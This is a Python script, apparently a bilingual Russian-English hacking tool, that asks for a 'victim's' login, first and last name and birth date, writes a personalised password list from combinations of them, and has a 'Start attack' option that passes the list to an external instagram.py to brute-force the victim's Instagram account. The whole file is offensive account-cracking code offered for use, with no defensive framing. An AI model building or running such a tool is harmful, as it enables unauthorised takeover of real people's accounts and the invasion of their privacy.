import os
import subprocess

from colorama import Fore, Back, Style

def cls():
    os.system('cls' if os.name=='nt' else 'clear')


cls()
print(Fore.GREEN + "")
             
print("    _       _  _ __  ")
print("  / _  | / _ \| '_ \ ")
print("  \__, | \___||_| |_| ")
print("  |___/ ")
print("  ")
print("         _ _   ___   ___ ")
print(" ( '_\  /'_ )/',__)/',__) ")
print(" | (_) )( (_| |\__, \\__, \ ")
print(" | ,__/'\__,_)(____/(____/ ")
print(" | / ")
print(" (_) ")
print(Fore.CYAN + " by @wannadeauth | @wannadeauth_chat (telegram)")
print("-------------------------------------------------")
print(" ")
print(Fore.YELLOW +  " [1] Save in file | Сохранить в файл")
print(Fore.WHITE + "")
print(" [2] Show in program | Вывести в программе")
print(Fore.RED + "")
print(" [3] Delete old file (of 1 item) | Удалить старый словарь (к пункту 1)")
print(Fore.MAGENTA + " ")
print(" [4] Start attack | Начать брутить (должен быть словарь)")
print(Fore.GREEN + "")
nachat = input(" Write parametr | Введите параметр : ")

if nachat == "4":
    cls()
    print(Fore.GREEN + "")

    print("    _       _  _ __  ")
    print("  / _  | / _ \| '_ \ ")
    print("  \__, | \___||_| |_| ")
    print("  |___/ ")
    print("  ")
    print("         _ _   ___   ___ ")
    print(" ( '_\  /'_ )/',__)/',__) ")
    print(" | (_) )( (_| |\__, \\__, \ ")
    print(" | ,__/'\__,_)(____/(____/ ")
    print(" | / ")
    print(" (_) ")
    print(Fore.CYAN + " by @wannadeauth | @wannadeauth_chat (telegram)")
    print("-------------------------------------------------")
    print(Fore.RED + " ")
    zeta = input("Username of victim | Юзернейм жертвы: ")
    list_files = subprocess.run(["python", "instagram.py", zeta , "pass.txt"])
    print("File instagram.py not found | Файл instagram.py отсутствует") % list_files.returncode
                                
if nachat == "1":
    cls()
    print("    _   _  _ __  ")
    print("  / _ | / _ \| '_ \ ")
    print(" | (_| ||  __/| | | | ")
    print("  \__, | \___||_| |_| ")
    print("  |___/ ")
    print("  ")
    print("  _ _      _ _   ___   ___ ")
    print(" ( '_\  /'_ )/',__)/',__) ")
    print(" | (_) )( (_| |\__, \\__, \ ")
    print(" | ,__/'\__,_)(____/(____/ ")
    print(" | / ")
    print(" (_) ")
    print(" ")
    print(Fore.CYAN + "")
    print(" by @wannadeauth | @wannadeauth_chat (telegram)")
    print("-------------------------------------------------")
    b = input(Fore.MAGENTA + "Login/email/number of victim | Логин/емайл/номер телефона жертвы: ")
    nam = input("Name of victim | Имя атакуемого: ")
    nam1 = input("Lastname | Фамилия: ")
    ag = input("Birthyear | Год рождения: ")
    dat = input("Number of birthmouth | Номер месяца: ")
    dat1 = input("Number of bithday | Номер дня: ")

    cls()
    file = open("pass.txt", "w")
    file.write(b + ":" + nam + ag + '\n')
    file.write(b + ":" + nam1 + ag + '\n')
    file.write(b + ":" + ag + nam + '\n')
    file.write(b + ":" + ag + nam1 + '\n')
    file.write(b + ":" + nam + nam1 + '\n')
    file.write(b + ":" + nam1 + nam + '\n')
    file.write(b + ":" + dat + nam + '\n')
    file.write(b + ":" + dat + nam1 + '\n')
    file.write(b + ":" + dat + ag + '\n')
    file.write(b + ":" + dat1 + ag + '\n')
    file.write(b + ":" + dat + dat1 + ag + '\n')
    file.write(b + ":" + ag + dat + dat1 + nam + '\n')
    file.write(b + ":" + ag + dat + dat1 + nam1 + '\n')
    file.write(b + ":" + ag + dat1 + dat + nam + '\n')
    file.write(b + ":" + ag + dat1 + dat + nam1 + '\n')
    file.write(b + ":" + nam + dat1 + dat + '\n')
    file.write(b + ":" + nam1 + dat1 + dat + '\n')
    file.write(b + ":" + nam + dat + dat1 + '\n')
    file.write(b + ":" + nam1 + dat + dat1 + '\n')
    file.write(b + ":" + ag + dat1 + dat + '\n')
    file.write(b + ":" + ag + dat + dat1 + '\n')
    file.write(b + ":" + ag + dat1 + dat + '\n')
    file.write(b + ":" + dat1 + dat + ag + '\n')
    file.write(b + ":" + dat + ag + dat1+ '\n')
    file.write(b + ":" + ag + ag + '\n')
    file.write(b + ":" + nam + nam + '\n')
    file.write(b + ":" + nam1 + nam1 + '\n')
    file.close()
    print("File 'pass.txt' has been created | Файл 'pass.txt' был создан")

if nachat == "2":
    cls()
    print(Fore.GREEN + "")
    print("    _   _  _ __  ")
    print("  / _ | / _ \| '_ \ ")
    print(" | (_| ||  __/| | | | ")
    print("  \__, | \___||_| |_| ")
    print("  |___/ ")
    print("  ")
    print("  _ _      _ _   ___   ___ ")
    print(" ( '_\  /'_ )/',__)/',__) ")
    print(" | (_) )( (_| |\__, \\__, \ ")
    print(" | ,__/'\__,_)(____/(____/ ")
    print(" | / ")
    print(" (_) ")
    print(" ")
    print(Fore.CYAN + " by @wannadeauth | @wannadeauth_chat (telegram)")
    print("-------------------------------------------------")
    print(Fore.RED + "")
    print("Если нет какой то информации напишите 0")
    print(" ")
    print("Максимум в программе должен быть один 0")
    print("-------------------------------------------------")
    print(Fore.BLUE + "")
    a = input("Login/email/number of victim | Логин/емайл/номер телефона жертвы: ")
    name = input("Name of victim | Имя атакуемого: ")
    name1 = input("Lastname | Фамилия: ")
    age = input("Bithyear | Год рождения: ")
    data = input("Number of birthmouth | Номер месяца: ")
    data1 = input("Number of birthday | Номер дня: ")

    cls()
    print(Fore.GREEN + "    _   _  _ __  ")
    print("  / _ | / _ \| '_ \ ")
    print(" | (_| ||  __/| | | | ")
    print("  \__, | \___||_| |_| ")
    print("  |___/ ")
    print("  ")
    print("  _ _      _ _   ___   ___ ")
    print(" ( '_\  /'_ )/',__)/',__) ")
    print(" | (_) )( (_| |\__, \\__, \ ")
    print(" | ,__/'\__,_)(____/(____/ ")
    print(" | / ")
    print(" (_) ")
    print(" ")
    print(Fore.CYAN + "by @wannadeauth | @wannadeauth_chat (telegram)")
    print("-------------------------------------------------")
    print(Fore.WHITE + "")
    if name == "0":
        print(a + ":" + name1 + age)
        print(a + ":" +age + name1)
        print(a + ":" +data + name1)
        print(a + ":" + data + age)
        print(a + ":" + data1 + age)
        print(a + ":" +data + data1 + age)
        print(a + ":" +age + data + data1 + name1)
        print(a + ":" + age + data1 + data + name1)
        print(a + ":" + name1 + data1 + data)
        print(a + ":" + name1 + data + data1)
        print(a + ":" + age + data1 + data)
        print(a + ":" + age + data + data1)
        print(a + ":" + age + data1 + data)
        print(a + ":" + data1 + data + age)
        print(a + ":" + data + age + data1)
        print(a + ":" + age + age)
        print(a + ":" + name1 + name1)
        print(a + ":" + name + name)
        what1 = input()
    elif name1 == "0":
        print(a + ":" + name + age)
        print(a + ":" + age + name)
        print(a + ":" + data + name)
        print(a + ":" + data + age)
        print(a + ":" + data1 + age)
        print(a + ":" + data + data1 + age)
        print(a + ":" + age + data1 + data + name)
        print(a + ":" + name + data1 + data)
        print(a + ":" + name + data + data1)
        print(a + ":" + age + data1 + data)
        print(a + ":" + age + data + data1)
        print(a + ":" + data1 + data + age)
        print(a + ":" + data + age + data1)
        print(a + ":" + age + age)
        print(a + ":" + name + name)
        what2 = input()
    elif age == "0":
        print(a + ":" + name + name1)
        print(a + ":" + name1 + name)
        print(a + ":" + data + name)
        print(a + ":" + data + name1)
        print(a + ":" + name + data1 + data)
        print(a + ":" + name1 + data1 + data)
        print(a + ":" + name + data + data1)
        print(a + ":" + name1 + data + data1)
        print(a + ":" + name + name)
        print(a + ":" + name1 + name1)
        what3 = input()
    elif data == "0":
        print(a + ":" + name + age)
        print(a + ":" + name1 + age)
        print(a + ":" + age + name)
        print(a + ":" + age + name1)
        print(a + ":" + name + name1)
        print(a + ":" + name1 + name)
        print(a + ":" + data1 + age)
        print(a + ":" + age + age)
        print(a + ":" + name + name)
        print(a + ":" + name1 + name1)
        what = input()
    else:
        print(name + age)
        print(name1 + age)
        print(age + name)
        print(age + name1)
        print(name + name1)
        print(name1 + name)
        print(data + name)
        print(data + name1)
        print(data + age)
        print(data1 + age)
        print(data + data1 + age)
        print(age + data + data1 + name)
        print(age + data + data1 + name1)
        print(age + data1 + data + name)
        print(age + data1 + data + name1)
        print(name + data1 + data)
        print(name1 + data1 + data)
        print(name + data + data1)
        print(name1 + data + data1)
        print(age + data1 + data)
        print(age + data + data1)
        print(age + data1 + data)
        print(data1 + data + age)
        print(data + age + data1)
        print(age + age)
        print(name + name)
        print(name1 + name1)
        lol = input()
if nachat == "3":
    myfile="pass.txt"

    if os.path.isfile(myfile):
        os.remove(myfile)
        print("")
        print("")
        print(Fore.MAGENTA + "Old dictionary was deleted | Старый словарь успешно удален")

    else:
        print("Error: file not found" , myfile , " | Ошибка: данный файл не был найден, либо он уже удален")

else:
    print(Fore.RED + "Finish program | Заканчиваю программу")

